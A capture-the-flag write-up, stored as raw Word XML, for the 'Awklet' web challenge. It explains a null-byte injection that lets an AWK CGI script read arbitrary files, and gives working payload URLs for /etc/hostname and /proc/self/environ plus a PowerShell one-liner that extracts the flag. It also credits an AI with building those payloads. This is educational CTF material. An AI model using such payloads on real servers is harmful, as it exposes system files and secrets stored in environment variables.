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40" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="2c3e50"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="2c3e50"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Write-Up - Awklet / Null-Byte Injection File Read</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002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Category: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Web 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180" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="34495e"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="34495e"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28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Awklet challenge presented a seemingly harmless CGI-based ASCII-art generator. It allowed a user to specify a name and a font, and the backend would render stylized text using an AWK script. Beneath the surface, however, the script had a subtle vulnerability related to unsafe filename construction combined with null-byte decoding.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005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AWK (and the C standard library underneath) treats \0 as a string terminator, it was possible to bypass the enforced .txt suffix and force the script to read arbitrary files on the server, including /proc/self/environ, which contains the flag as an environment variable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006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vulnerability is a classic example of null-byte injection, a well-known but still occasionally overlooked issue in file-handling logic.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180" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="34495e"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="34495e"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Understanding the Backend Logic</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008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AWK script responsible for generating ASCII art followed this simplified flow:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009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Read query parameters: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="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2c3e5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c3e50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">name=&lt;input&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">
      <w:pPr>
        <w:spacing w:after="240" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2c3e5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c3e50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">font=&lt;font_name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C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URL-decode %xx escape sequences, including %00.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D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Build a filename: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120" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2c3e5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c3e50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">filename = font_name ".txt"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F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Open the 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120" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2c3e5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c3e50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">getline line &lt; filename</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011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file contents as a "font" to render ASCII art.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012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central mistake: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script accepted %00 in user input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treated it as a literal \0 byte when decoding.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015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\0 appears inside a filename, the C fopen() call used internally stops reading the string at the null byte.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016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Thus:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
      <w:pPr>
        <w:spacing w:after="240" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2c3e5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c3e50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">font=/flag%00</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018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becomes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">
      <w:pPr>
        <w:spacing w:after="240" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2c3e5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c3e50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">filename="/flag\0.txt"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A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C's fopen() sees only:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">
      <w:pPr>
        <w:spacing w:after="240" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2c3e5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c3e50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"/flag"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C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.txt portion is never reached.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before="180" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="34495e"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="34495e"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Initial Testing &amp; Verification</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E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 first test was to confirm that the exploit was working by reading a harmless file. Using the browser or PowerShell, I requested:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
      <w:pPr>
        <w:spacing w:after="240" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2c3e5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c3e50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">https://awklet.challs.pwnoh.io/cgi-bin/awklet.awk?name=%20&amp;font=/etc/hostname%00</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020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returned:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">
      <w:pPr>
        <w:spacing w:after="120" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2c3e5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c3e50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here's your /etc/hostname ascii art:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">
      <w:pPr>
        <w:spacing w:after="120" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2c3e5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c3e50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;container hostname&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">
      <w:pPr>
        <w:spacing w:after="120" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2c3e5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c3e50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;blank&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">
      <w:pPr>
        <w:spacing w:after="120" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2c3e5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c3e50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;blank&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025">
      <w:pPr>
        <w:spacing w:after="240" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2c3e5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c3e50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026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the AWK ASCII renderer always prints 7 rows (one per "font line"), the output had the hostname on the first line followed by empty lines.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027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proved: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null-byte bypass worked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Arbitrary file read was happening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.txt extension had been effectively removed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before="180" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="34495e"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="34495e"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Extracting the Flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C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next logical step was to access the environment variables, where many CTF containers store their flags.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002D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Attempt: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120" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2c3e5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c3e50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/proc/self/environ%00</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002F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PowerShell version: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120" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2c3e5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c3e50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$raw = (Invoke-WebRequest 'https://awklet.challs.pwnoh.io/cgi-bin/awklet.awk?name=%20&amp;font=/proc/self/environ%00').Content</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">
      <w:pPr>
        <w:spacing w:after="240" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2c3e5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c3e50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">($raw -split "`0") | Where-Object { $_ -match '(?i)\bflag=' }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032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/proc/self/environ contains KEY=value pairs separated by null bytes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Splitting on NUL reveals each variable cleanly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Searching for "flag" locates the environment variable containing the challenge flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000036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successfully produced a line like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037">
      <w:pPr>
        <w:spacing w:after="240" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2c3e5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c3e50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FLAG=bctf{...}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038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confirming the correct output.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before="180" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="34495e"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="34495e"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Why /flag Didn't Work Initially</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A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Attempting to read /flag%00 returned blank rows. This occurs when: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file doesn't exist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doesn't contain printable characters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AWK didn't populate the positions expected for ASCII glyphs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E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normal and indicates only that /flag was not the right path for this deployment. /proc/self/environ remains the more reliable source.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before="180" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="34495e"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="34495e"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How AI Assisted</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040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provided crucial help at several stages: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100" w:before="160" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="34495e"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="34495e"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Exploit Strategy Recognition</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042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AI quickly identified this as a classic null-byte injection issue once the AWK script was inspected, explaining how %00 → \0 affects filename resolution.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100" w:before="160" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="34495e"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="34495e"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Constructing the Correct Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044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produced precise URLs for testing /etc/hostname, /flag, and /proc/self/environ, ensuring the syntax and encoding were correct.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100" w:before="160" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="34495e"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="34495e"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Handling NUL-separated Data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000046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Environment files contain data separated by null bytes. AI provided PowerShell one-liners to properly split and search these entries - something that would be tricky for beginners.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100" w:before="160" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="34495e"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="34495e"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Providing Practical Debugging Advice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048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/flag didn't output anything, AI explained why and guided the pivot to /proc/self/environ, demonstrating proper methodology rather than trial-and-error.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before="180" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="34495e"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="34495e"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A">
      <w:pPr>
        <w:spacing w:after="12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The environment variable contained the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